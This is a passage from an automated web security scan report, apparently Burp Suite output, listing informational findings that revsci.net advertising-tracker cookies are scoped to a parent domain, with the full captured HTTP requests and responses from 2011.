rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLt+Jj4m8aYFMryjeoi0TlzQ7R2IFcY8A30Ro53whtEoiH/Bu+WvCryZgtVikCSLPEeifdrCBZbLvKqIu+csveC9Xvf9d5VgUHFOWSjk0wT5Gkq6w5xqk/1aGiVp/rFuGh27GkpR+EliPHK1f2TWLYL1sXbC6eUwGWzUNsS8f4urLm2iUv1hCiOqDYuCA+YOB3u+NuABggAS5kmHVELSWX4cloNZjgJZMm0hekaZh4U8yWjZaCJ0Bmnt8bp+36AYTy2RK/Zy6wuxfF0yL+Z3FX0VqsfdIqoFyg4NZ9NBFfq7URU2DPpMVVUjkuIZeF0zcZeRcX1SiHrVfftbww4SHkAQdGCn6sxzMGWYNPxCDuMExJmhEklLXOjTcEFvdt2jdiJV7ijBACODAgmsT7h+Q0sgAVcAmzxwHjFD/A8MFcKuygD9YvoFo4W2a+Rdsriq/gbj+6nJ/doEw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfqkDDDA6eA08p566AWsC6dZEToDZUZ7/JkL2T9iF2WdR9KJhTybAZxS4F8a2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFWddAYMSGIntIJ56bP4P6/Yl+5XrH+SP65GfKkcTktT+ixZURa1DGnHu9JHEFB0mc0sF31AINfSJunXxe34XYbmFaIfjesfMWQXpheEvi041VI6cB5PWkN9EEOPhVD6kYISOzHi1mYdZ8NX5Voy+/nUm3e1K+DfKvY3L3ke5rRMvaZZt6BTdOxx6db2mp2hiLwrTkygILbiA5eUJuDXyNvAC52oOVf/ejg6t1LMkqPwWsWmnhyumL/+ztQ44CQzdB/PvH+Kf9vSQMvnX6CdIRf4eqLBaYL9wZ89pCHDj9TA7TN6znKPuazTN1uXnFQh7g+YauJCG0vRJlkLZ2JhTFXPyw3KOca5snkA/tFhkUHVRSZi3Bv+jFnqV1v1Hkj/kayttJKF31X7Ji6YV0ikrpLRZHqRm+rkvb/hVsZFF90TbcJj8HFd45r6m6g7g8ZNWHnfAa/gOp54xSyfsPeY6sWzt6IKQdWUHX7iMDMhesN4RKNyYcM3mb9hJMy/zos8eUq6DzvJAV5vLvpUTI6M7DV8YuWBRq4WHNNo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:05:43 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:05:43 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.140. http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/266829410.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgpvScH9tFeRMhELpJLSfJyoeffq5ibS0Z4hZAe4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUhJ6UX8rURuWyiJPXLj3B0M2CF0kB3srOQf+cRoMKbq4XH6tE2Dcioboe+cnDDJZgSt6tgeDB7qFfWLRUPsLU7uupkxJoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:53:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/266829410.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_se2A="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3Jk6SbsCfwKDgucnoVndUdsXg/E8SpUPh7CZbT9OTHEbPpAEzzEycP7TsZSrmbAXqvyAnZQkV7lU/B2MOKFUykKvrpRcmF0nJyAp/IIs52dxbkeEZeJHTrH3piSjAl/A9CxHcp4EIGlRFPrEz44qNciyXNyNPA7t4DjhfFhz+mSgAuapRAcwb1AjQ/G82FXP2mjpVADOF2xKnxM+zp21JS9H8g4GxK/mK3wfrpS37w1n27ZR7mhNE3sGCmHExiSmmxpb3c8r8M4A+eA6AVLelupAH+fyo11VE0Sxq4gQ9QzUIz2m/wkcntTG/DrA1bvImZ4oMFsg1ZBh8zhArukh6IsU0xyBPConG73Eg6NBrGbAOgz35UaOBqOz9V/zxunEckZPwq3/tNkcugaVCrNfW8U8ILSCryk8GHt9xZt5vxScvGbbWNTjXQafOpwbr5rFF1+BD8S2ObUY6Y5VETWBFbkNkMVLLouJ2gRlChW7yKsc2/TykD3WduHeAYO1/2jTh1A1sbmVHV70lPTr/AOtx0+mNv7H/DEWx3w79SWxU/boxa8lNWAgIQsdj4TzL6UYQqCofGuWepprTRQfBXKjE6HL43prcb77W6JOWOf1fkdhC44+t1vWBzCOcddE4VxrO81izVKM5J4VAvDveIoG/NoLfu/XdweMpzPYLx3F7nF89PDzwwIUgTZkVlX1lb+adlOIFQN13aDxad8IwmgsnS4etQWBbVl+IrIcLGKyHhU0rGIYc9gWIcKBEwblV+JC4xT8mJM0VwEO0J4wQ2iqmGjMWEa+jsAZUTcNuZbIEEfKcrElBNBOAYHAKp8XrzMFYb0XjWXLplKPRo9qdwzxhSzbwzHq8AgBKwPQuLWAzKO98KNrKPXvtF3pC/8qzognFQY1Hoqh+fttDIJxXXtjMNwJnfRMM+Yd3nQVKm666Tt4oCmei7RTKK87epL/n3jgN1aU7w0/Z1WtpYYT2Fj4UL2LkeWKDyxZ+D07aQKuzZDMS7KtDKmFSPF+j1LsPAxS01qwCXZDKTFOiM5gZqCl3/jEbS2d3yTlI7OdVP74E0hw8V9PByMU6wEaiwLOUgicHXDqdEQgBs6z0u9bUckT6slYcAAdfxDIt+oYtmmXZhEVNRwG5qKVyVCGgTNjoi7/icj9NyecApst+OtFYl898wXxWLNTzFb+kxa+i1gxt6oklB+Lsmo/jjq0B0ZndrAnRt6G1YvE8mUcYspEk0IwVpfq8+rB3pzqOgo86lbS0zYGPIr1vEoE6JMZPfgz0XGJ/VhaC4sceW1zQOm97IyrSFkPsXT"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBr0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxH0lsZ65lpt0Uj/e/FhIvuvzMNslSaKKkMahrWK9wHox3e73jkHJpg7Oz8ZDHGqRushnLHAEpFVpmxyDJY1KqlF/Ai8Md6bGPzOhDQMwAtMWuZtluoPvJjt1fwIlffmL+z1yR/GPQqbpTCublp+D1SvzQSV/hOlu9q+RM3c4Garq2nu4DnqmJ+yUAqBd8D2AZVKrKfRtlSE9+YQQ+zwqeoxaJQ8KPbRs7ltrGlxeHqSMaX19gaE2xMMBZhjxJkFt1T/bGHYEGuaAKkz08JssuH5GhvI640MvWIsTsRJYcKr9snPvD86GuQLDawVBceHvi3ZcKHFYzWlmYG5hZ4BbEmxcHVVsJoNoedWGxzh91dF1rEnjYNXjol1tgoEZKIErCi/GSXqQouEegYJZ0WXDIQDpQm79hqzDacfXdw4pVE6QWmhsRxs3gkrTXNfjyo1Nm2HFWh51gDCWZz/vgwQZAsXh9ptmyEKtvZMgxFFDyBGhbgn9zQ/GUknsOyRhdx5kwWibcKCKins5hsPaXqSQ6XeUJl9g5Rg9Up1bnFeSsjT61JEWGr4dxQL7wjJWyAkQ9k1I/CM/chFqU188g+XUpOH+hdij8lrpJCnhRi4MUPDm91F6JBytj8le8bV4Ia8Q/DD5+p/eUUqZsZmTjPRsp6F6TSBJK1iLus4MZDk8CWA7mn6mVZwi+e+RM7F7P8hzVmuQxfY6UBaMLuZiUDjI4RhHh7eqk9KB+8BZqFWnYN/HZzugJrI0vy8idTiU7+33yzI8Pmt4zAbzaZcYC/lFrFGED0pD5EJ/zjo+7+vSB0rylw0Yd/wpytuMzpsmDcDy5fTDpkiMtqdr2u/tLfIW8c1Du+p46s1eIeV4wdyhjIw4ogIe5noIVWSOyDKHKB8UV+kPrGHpCLp2bzstXpEysIdhVffF7FMCeyCNmZ5SMulqu5u6ytLS2vueoTUSHaTjabV/uytyFgWaLL7mizye4bMAK/OltQjqwZwXf+c3piPfyL9FQI4A7FO7oqBogV6RjXrWd01tXkImPIoNEmwJASSKu2pB46enweqy14lHKPZKsIym+R6FwvKsbo/6ewAUwcCsvq1FdujoTS5m6tqwCvxlaHIho7EDkIAAVypTiR0c2gj8APDXXA978ujk7aziCwdHfysJTPk2RdFpcNnav0XDieageBwYWJ5qHoslTwoXGieQc9UKfcVibAWBhaXNhEtr36p4+4g8qhGVo9HXvAQsYTe1m0pjK1biTeV5fGaq6dHdCIghzU31z7gEi1DZ4+rgEeAmaT71AbQB06H7O/wYaa3hKf7k9KdCu4fv71VdZu7x+YaehMbksJjjc1eC74wu91tRhHRgCE5A/B5Z5tK+StSu9EqgTsHfg7wnHsS5lN7ANxVfkD54qye6zUVRR4m7t/jFuTlIO94djAmWTfKRSg+lfy7hZZ7ohXcKjMhUfvGmDC4DuN/DcGiR82YnIyxg23B/TsKLsa2CbuoJxrTqggTRb3klplHzgv8t+bO4AerUdXMtiawc++5ksQ5J+1BIXKtrKkEY+tBr0Rc9bv9Orjns7g7zuA8yo1p3dlPhSsrAVieOspZdA5ctEP4pQZYAscY5Ae0Qv7agxh1J7bzE/ENaNb+pDLc8KiQH0T/rgjwb5k740jJT3hXDBk9w/GxvyvbMp7+kswOkdSxtex01062wYIyL5aqx0ZMcRKvASY8sKHtYI5T30DBFTEcebuDDmA=="; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBegtiNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFkigtQN54egzBWSJbEl9x+KwhkZ/Hwp6OAwK0KDgJNFjefPJSX9UKXFEh4DBz8ZSIsDwsiIIhSOP7byyJpIi4bVqNzEk+8Ul6xB61Q7SixmsmVMhpVPNwDt2vRKGWlEkYkIZ52Q2cWjtmFe+5r6mqja6lDLQSZuaxJeUX8rURuWyiJPXLj0R0c2CF0kBvq3OQf+cRoMKbq4XH6tE2DeCpboe+cnD9JZgSt6tgeDB7iFQ6t/PIpJI6cxeuZN7NNE=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgpvScH9tFeRMhELpJLSfJyoeffq5ibS0Z4hZAe4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUhJ6UX8rURuWyiJPXLj3B0M2CF0kB3srOQf+cRoMKbq4XH6tE2Dcioboe+cnDDJZgSt6tgeDB7qFfWLRUPsLU7uupkxJoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:53:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:53:16 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.141. http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/271822828.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQm8locHcCtpU+w6+9L5G+51oBVUZ75smbLZJtOP/GjGxMTb2WDbVjI5teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa0ATFgWdPtKIFHNv4PL1RUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKuRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHVwaNKdWI3SWQJ9zzYJE3gOggYzS8l60cF2fThYKZWrEcWW0BvTeT4FW1ruM7/GaXYHlxlcxlY9e55vKxtpoLjzvvQQaHTPh0X0eya3DxMPDEKTB7ClAkJ3WaqRODPcKx/IuH584RkrsmRfc3CFuvdQc0Syy+EOVpga9Cu2Xug1fvFX09UyjpIf1CPZg+MO8wDnyDEevJoubP5q5X3Lq6ZiemknQeXxBEDacfeaEMQXdpBhlOxi8v9qsbVInoJQonM0vTfQQpah4iS4oUHt1+jp8Byyj3g4i4gWPGhmo9uQu30piYpJ6rKG2SBlvK3zJDw2m8WCPhtshtALXAv2bHK8p7f2YFxvlhHegoqbRiuVkn648ssnvenZ8GBjgQycrYza/h6YBb3rWnciO7z0O5BtFcOnuBk0rszDsvXmWGiLJUNhN0PeyhlURoDg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:11:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/271822828.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; 